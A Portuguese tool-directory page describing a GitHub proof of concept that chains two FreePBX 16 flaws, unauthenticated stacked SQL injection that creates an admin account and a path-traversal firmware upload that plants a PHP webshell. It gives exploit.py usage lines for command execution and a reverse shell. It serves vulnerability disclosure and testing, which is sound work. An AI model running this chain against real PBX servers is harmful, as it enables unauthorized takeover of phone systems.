Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
Ferramentas/GitHubGitHub/teteren/cve-2025-57819-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

Ver Repositório
3há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

FreePBX 16 — De SQLi não autenticada a RCE

Resumo: Esta documentação demonstra como combinar duas vulnerabilidades no FreePBX 16 (CVE-2025-57819 e CVE-2025-61678) para construir uma cadeia de ataque completa que evolui do acesso não autenticado à execução remota de código (Remote Code Execution, RCE).

Informações das Vulnerabilidades CVE

Baixar ferramenta
ID do CVEComponente AfetadoImpacto e Tipo de Vulnerabilidade
CVE-2025-57819Carregador de módulos Endpoint (parâmetro brand)Injeção SQL empilhada não autenticada (Unauthenticated Stacked SQL Injection)
CVE-2025-61678Processador de upload de firmware do Endpoint Manager (parâmetro fwbrand)Upload arbitrário de arquivos autenticado / Path Traversal

Método e Fluxo do Ataque

  1. Criar conta de administrador (CVE-2025-57819): Através do carregador de módulos namespaced (Namespaced Endpoint Loader), aciona a vulnerabilidade de injeção SQL empilhada não autenticada, gravando diretamente uma nova conta de administrador com privilégios totais na tabela ampusers.
  2. Autenticação: Utiliza as credenciais de administrador recém-criadas para acessar o painel administrativo do FreePBX.
  3. Gravar WebShell (CVE-2025-61678): Abusa do recurso de upload de firmware do Endpoint Manager, combinando a vulnerabilidade de path traversal no parâmetro fwbrand (../../../var/www/html/<dir>), para gravar um WebShell PHP diretamente no diretório raiz do site.
  4. Execução de comandos: Chama o WebShell implantado para executar um único comando do sistema ou estabelecer um reverse shell interativo.

Versões Afetadas e Recomendações de Correção

Versões afetadas: FreePBX 16 (versões do módulo Endpoint anteriores a 16.0.92)
FreePBX 17 (corrigido na versão 17.0.6)

Recomendação de correção: atualize para a versão corrigida mais recente o mais rápido possível.

Instruções de Uso (Usage)

root@kitploit:~
# Executar um único comando
python3 exploit.py --rhost pbx.example.com --command "id"

# Estabelecer um reverse shell interativo (escuta automática com pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# Usar HTTP simples com porta personalizada
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Descrição dos Parâmetros (Options)

ParâmetroDescrição
--rhost[Obrigatório] Endereço do host de destino (Target Host)
--rportPorta de destino (padrão: 443)
--httpForça o uso de HTTP em vez do HTTPS padrão